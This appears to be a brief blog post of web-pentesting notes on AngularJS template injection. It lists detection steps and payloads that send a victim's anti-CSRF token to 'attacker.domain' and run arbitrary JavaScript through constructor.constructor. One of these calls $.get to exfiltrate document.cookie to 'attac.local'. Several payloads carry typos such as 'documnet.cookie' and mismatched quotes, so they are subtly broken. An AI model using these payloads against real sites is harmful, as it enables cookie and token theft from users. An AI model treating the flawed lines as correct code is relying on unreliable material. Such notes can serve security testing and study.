Template Injection & Scope Hacking
- Attack is limited to $scope functions and variables
- Check if an application is using angular JS & Vulnerable to Template Injection or not.
- Check the source code for `angular` keyword
- open dev tools --> Console --> `angular.element($0).scope()`
- This lists the scope - all the elements in the page
- Check the soure code of functions to see what its doing
- Developer tools --> Debugger --> Select app.js (whatever JS filename is) --> search for that function ;
- Check for any injectable variables (Ex: some empty or dynamic content )
- Call the function
- Send the below payload as input and see the connection going out - which has the victim's anti-csrf token
-` {{Function_Name("https://attacker.domain/reach.php?x="+anti_csrf"")}}`
- input `{{4-1}}` --> if the output is 3 --> VULNERABLE
- use this any input or search parametes.
Going Beyond the Scope - XSS via Template Injection - Works in AngularJS>= 1.6.0 - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs - Find Angulra Version in Dev tools --> console - angular.version - Create an alert - `{{constructor.constructor('alert(document.domain)')()}}` - Get the user cookie -` {{constructor.constructor('$.get(\'//attac.local/log.php?\'+documnet.cookie)')()}}` - If there any known varaiable - `#var_name=constructor.constructor('$.get(\'//attac.local/log.php?\'+documnet.cookie)')()`
Comments
Post a Comment